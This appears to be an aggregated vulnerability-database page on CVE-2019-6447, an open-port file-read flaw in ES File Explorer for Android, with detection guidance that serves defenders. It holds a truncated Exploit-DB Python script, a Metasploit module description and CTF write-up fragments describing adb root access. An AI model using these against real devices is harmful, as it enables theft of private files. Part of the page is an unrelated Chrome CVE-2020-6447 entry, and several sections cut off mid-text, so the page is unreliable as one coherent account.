CVE-2019-6447
published 2019-01-16CVE-2019-6447: The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP…
PriorityP271high8.1CVSS 3.1
AVAACLPRNUINSUCHIHAN
EXPLOIT
EPSS
62.02%
99.1th percentile
The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| estrongs | es_file_explorer_file_manager | <= 4.1.9.7.4 | — |
| chrome_chrome | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated HTTP POST requests to TCP port 59777 with Content-Type: application/json body containing a 'command' key — this is the exploit trigger for CVE-2019-6447. ↗
- →Monitor for HTTP GET requests to port 59777 with a file path appended (e.g., GET /storage/emulated/0/...) — this is the file download vector used by the exploit. ↗
- →Flag any process or network listener binding to TCP port 59777 on an Android device; the port persists open after ES File Explorer is launched once. ↗
- →Nmap identifies port 59777 as 'Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older' — this fingerprint on a mobile/Android device is a strong indicator of the vulnerable ES File Explorer service. ↗
- →The Metasploit auxiliary module 'scanner/http/es_file_explorer_open_port' can be used to detect and exploit the open port; presence of this module in scan logs indicates active exploitation attempts. ↗
- ·The vulnerable HTTP server on port 59777 is only reachable from the local Wi-Fi network, limiting remote exploitation to network-adjacent attackers — not internet-exposed by default. ↗
- ·The port persists open even after the user backgrounds the app — detection/blocking should not assume the app must be actively in the foreground. ↗
- ·The Metasploit module was tested against version 4.1.9.5.1 specifically, though all versions through 4.1.9.7.4 are reported vulnerable. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
nvdv2.04.8MEDIUMAV:A/AC:L/Au:N/C:P/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2pqf-jwpx-hmhw: The ES File Explorer File Manager application through 4
ghsa_unreviewed·2022-05-13
CVE-2019-6447 [HIGH] CWE-306 GHSA-2pqf-jwpx-hmhw: The ES File Explorer File Manager application through 4
The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.
Chrome
Stable Channel Update for Desktop: CVE-2020-6447
vendor_chrome·2020-04-07·CVSS 8.8
CVE-2020-6447 [LOW] Stable Channel Update for Desktop: CVE-2020-6447
Stable Channel Update for Desktop
CVE-2020-6447: Inappropriate implementation in developer tools. Reported by David Erceg on 2019-08-06
[$N/A][ 1037872 ] Low CVE-2020-6448: Use after free in V8
Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2019-12-26
Severity: low
No detection rules found.
Exploit-DB
ES File Explorer 4.1.9.7.4 - Arbitrary File Read
exploitdb·2021-06-29·CVSS 8.1
CVE-2019-6447 [HIGH] ES File Explorer 4.1.9.7.4 - Arbitrary File Read
ES File Explorer 4.1.9.7.4 - Arbitrary File Read
---
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
import requests
import json
import ast
import sys
if len(sys.argv) [file to download]")
sys.exit(1)
url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
if cmd not in cmds:
print("[-] WRONG COMMAND!")
print("Available commands : ")
print(" listFiles : List all Files.")
print(" listPics : List all Pictures.")
print(" listVideos : List all videos.")
print(" li
Metasploit
ES File Explorer Open Port
metasploit
ES File Explorer Open Port
ES File Explorer Open Port
This module connects to ES File Explorer's HTTP server to run certain commands. The HTTP server is started on app launch, and is available as long as the app is open. Version 4.1.9.7.4 and below are reported vulnerable This module has been tested against 4.1.9.5.1.
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
CTF
Explore / README
ctf_writeups·CVSS 8.1
CVE-2019-6447 [HIGH] Explore / README
# Explore - HackTheBox - Writeup
Android, 20 Base Points, Easy
## Machine
### TL;DR;
To solve this machine, we begin by enumerating open services – finding the ports ```2222```,```5555```,```33897```,```42135``` and ```59777```.
***User:*** Found related ports of [ES File Explorer](https://es-file-explorer.en.uptodown.com/android) application with [CVE-2019-6447](https://nvd.nist.gov/vuln/detail/CVE-2019-6447) which allow us to read files from the device, Using that we found an image with SSH credentials.
***Root:*** Found port ```5555``` which is ```adb```, Create SSH tunnel and run ```adb root``` and then ```adb shell``` to get a shell as a root user.
## Explore Solution
### User
Let's start with ```nmap``` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/Explore]
└──╼ $ n
http://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.htmlhttps://github.com/fs0c131y/ESFileExplorerOpenPortVulnhttps://twitter.com/fs0c131y/status/1085460755313508352http://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.htmlhttps://github.com/fs0c131y/ESFileExplorerOpenPortVulnhttps://twitter.com/fs0c131y/status/1085460755313508352
2019-01-16
Published